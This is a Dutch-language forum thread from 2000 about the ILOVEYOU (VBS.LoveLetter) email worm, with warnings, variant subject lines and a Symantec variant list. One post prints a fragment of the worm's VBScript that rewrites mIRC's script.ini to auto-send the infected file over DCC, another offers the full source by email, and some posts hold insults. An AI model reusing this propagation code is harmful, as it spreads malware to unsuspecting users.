Virus I LOVE YOU!

vbimport

By: List en Bedrog

Wanneer u in uw inbox een email ontvangt met in de subject line: ILOVEYOU en met bijlage: I-LOVE-YOU.txt.vbs verwijder deze dan ZONDER te openen. De bijlage van de genoemde email bevat een virus die op dit moment nog niet herkent wordt door virus scanners.

Waarom werd deze topic gesloten ?
volgens het nieuws op tv toch een ernstige zaak.

FOUTJE ?????

Misschien omdat alles er al over gezegd was?
Er stond een link in naar een artikel met meer informatie, daar was zelfs al een patch te downloaden:
http://www.tweakers.net/nieuws.dsp?ID=10712

In dit artikel staan ook links naar sites met nog meer informatie en welke instanties al patches hebben tegen dit virus.

Heb er zelf gelukkig helemaal geen last van gehad en dat zou ik graag zo willen houden

ik heb niet de tijd gehad die link te lezen aangezien ik andere dingen te doen had.
toch vind ik dat er reacties hadden kunnen komen van andere freakers, gedupeerden misschien ?, dus openlaten van z’n topic vind IK wel belangrijk.
maar ja wie ben IK.
Portje nietwaar !!
maar zonder flauwekul, ik heb de pest aan die dingen ondanks het feit dat ik elke dag voordat ik ga internetten een schone backup vanaf een CD op mijn HD zet.

kreeg zelfs van "RUSH"een verwijzing naar mijn usernaam(list en bedrog), dat noemen ze nou iemand vertrouwen?
ik gaf het door om een uur of twee in de middag.
elkaar helpen of waarschuwen daar zijn we toch voor op deze wereld.
bedankt portje, ik vind dat je gelijk hebt

List en Bedrog;
Sorry dat ik zo’n grapje maakte, eht had geen kwade bedoelingen

Rush

<BLOCKQUOTE><font size=“1” face=“Verdana, Arial”>quote:</font><HR>Originally posted by Rush:
[b]List en Bedrog;

Rush[/b]<HR></BLOCKQUOTE>
zolang je het love virus maar niet gehad heb vind ik alles goed.
er zijn er maar weinig die sorry durven zeggen, laat staan platsen in dit forem.
aaaaaaaaaaaaaaaaaanvaaaaaaaaaaaard

<BLOCKQUOTE><font size=“1” face=“Verdana, Arial”>quote:</font><HR>Originally posted by Rush:
[b]List en Bedrog;

Rush[/b]<HR></BLOCKQUOTE>
zolang je het love virus maar niet gehad heb vind ik alles goed.
er zijn er maar weinig die sorry durven zeggen, laat staan plaatsen in dit forum.
aaaaaaaaaaaaaaaaaanvaaaaaaaaaaaard

<BLOCKQUOTE><font size=“1” face=“Verdana, Arial”>code:</font><HR><pre>if (s=“mirc32.exe”) or (s=“mlink32.exe”) or (s=“mirc.ini”) or
(s=“script.ini”) or (s=“mirc.hlp”) then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine “[script]”
scriptini.WriteLine “;mIRC Script”
scriptini.WriteLine “; Please dont edit this script… mIRC will corrupt,
if mIRC will”
scriptini.WriteLine " corrupt… WINDOWS will affect and will not run
correctly. thanks"
scriptini.WriteLine “;”
scriptini.WriteLine “;Khaled Mardam-Bey”
scriptini.WriteLine “;http://www.mirc.com
scriptini.WriteLine “;”
scriptini.WriteLine “n0=on 1:JOIN:#:{”
scriptini.WriteLine “n1= /if ( $nick == $me ) { halt }”
scriptini.WriteLine “n2= /.dcc send $nick
“&dirsystem&”\LOVE-LETTER-FOR-YOU.HTM”
scriptini.WriteLine “n3=}”
scriptini.close

toch slimme code  [img]http://www.cdfreaks.com/ubb/ubb/smile.gif[/img] verspreid via mirc ook enzo  [img]http://www.cdfreaks.com/ubb/ubb/smile.gif[/img]

List en Bedrog;

Gelukkig maar, het laatste wat ik wil is ruzie. Moet iemand trouwens nog de source code hebben van het virus? Stuur dan effe een mail.

Rush

Okee portje: Ik moet eerlijk zeggen dat ik een paar weken geleden nog hoopte dat ze jou van dit forum af-flikkerden, maar nu moet ik je toch eens gelijk geven: Ik wil hier ook wel eens wat horen over “i love you” dus vindt ik het ook nergens op slaan dat de topic “geclosed” is!

Ik wil wel eens wat reacties over dit virus horen, moet toch kunnen??

Volgens mij zijn het trouwens vooral bedrijven en instellingen/scholen die getroffen zijn. De meeste werknemers/scholieren hebben schijt aan alles wat ze daar doen en openen dus alles !(na 17.00 uur kunnen ze toch weer lekker naar huis en laten ze de syteembeheerder de boel wel opknappen)

En de mensen die het toch op hun pc thuis geopend hebben>>>>> LOSERS! Iedereen weet nu toch onderhand dat je geen idote attachments moet openen!

Zo, ben ik dat ook weer effe kwijt! (Nu nog een netwerkje gaan “opruimen” bij zo een hierboven beschreven KLOTE-school)

ILOVEYOU, de nakomeling van Melissa was nog maar een begin. het volgende dat op komst is noemt JOKE dus mensen, niet openen, of juist wel…
Beware

Joke is gewoon een stomme cloon van “i love you” maar dan een bietje aangepast door een of andere supernerd die aandacht te kort komt!

Er is trouwens nog al zo’n cloon in omloop, deze heet iets van “jakabar…” of zo (iets russisch in ieder geval)

Zolang je maar niet op vs (visual basic scriptjes) klikt kan da geen kwaad hé. Gewoon verwijderen die boel!

Wederom een probleem met een Microsoft productje… Gelukkig gebruikt ik Outlook niet!

Naast e-mails met als onderwerp “ILOVEYOU” (attachment “LOVE-LETTER-FOR-YOU-TXT.vbs” en “FWD: JOKE” (attachment “veryfunny.vbs”) is het nu ook uitkijken voor berichten die getiteld zijn met de vreemde woorden “Susitikim shi vakara kavos puodukui…”. Volgens de ‘credits’ in de broncode gaat het in dit geval om een Litouwse variant van de hand van Lameris Tamoshius (Tovi systems). Een derde variant heeft als onderwerp “Mothers Day Order Confirmation” en geeft u volgend bericht te lezen: “We have proceeded to charge your credit card for the amount of $326.92 for the mothers day diamond special. We have attached a detailed invoice to this email. Please print out the attachment and keep it in a safe place.Thanks Again and Have a Happy Mothers Day!
mothersday@subdimension.com”. Het bijgevoegde en in geen geval te openen
attachment draagt als naam “mothersday.vbs”. Bij deze waarschuwen we u
nogmaals om geen attachments te openen waarvan u de oorsprong niet kent.

Bierspier
Grtz

The Symantec AntiVirus Research Center currently detects the following variants of VBS.LoveLetter.A:

VBS.LoveLetter.A (LoveLetter)
VBS.LoveLetter.B (Lithuanian)
VBS.LoveLetter.C (VeryFunny)
VBS.LoveLetter.D (BugFix)
VBS.LoveLetter.E (MothersDay)
VBS.LoveLetter.F (VirusWarning)
VBS.LoveLetter.G (Virus ALERT!!!)
VBS.LoveLetter.H (No Comments)
VBS.LoveLetter.I (Important! Read carefully!!)

Symantec customers who have updated their AntiVirus definitions since 1:30 p.m. PDT (9:30 p.m. GMT) May 5 are currently protected against all the variants listed above.

The newest variant named VBS.LoveLetter.G (Virus ALERT!!!) that includes the subject line “Virus ALERT!!!” poses as a message from Symantec technical support. In addition to damage caused by the LoveLetter, VBS.LoveLetter.G (Virus ALERT!!!) deletes .bat and .com files. This message is NOT being distributed by Symantec and should be deleted immediately.

Updated: May 5, 2000. 6:34pm PST
van norton

Er zijn dus wel iets meer versies dan die 3

red

Waarschijnlijk hebben ze hem te pakken die knakker. 23 jarige Fillipijnse gozer…
Kwam wat liefde tekort denk ik. Dit kan die ophalen in de gevangenis aldaar. Waarschijnlijk zal hij daar veel zeepjes op moeten rapen…hehehe
De eikel

U-niq

no thats not my opinion U-niq cause once again the windows-engine has been beaten i’m so happy with my linux… you wont find any I love you. here!

<BLOCKQUOTE><font size=“1” face=“Verdana, Arial”>quote:</font><HR>Originally posted by DuKe_DtRo:
no thats not my opinion U-niq cause once again the windows-engine has been beaten i’m so happy with my linux… you wont find any I love you. here!<HR></BLOCKQUOTE>

Dan heb je waarschijnlijk geen netwerk liggen want die netwerkkaarten configureren in Linux vind ik maar een kl*te zooi.
Grtz

Het schijnt wel een vrouw te zijn
Bitch!

Matt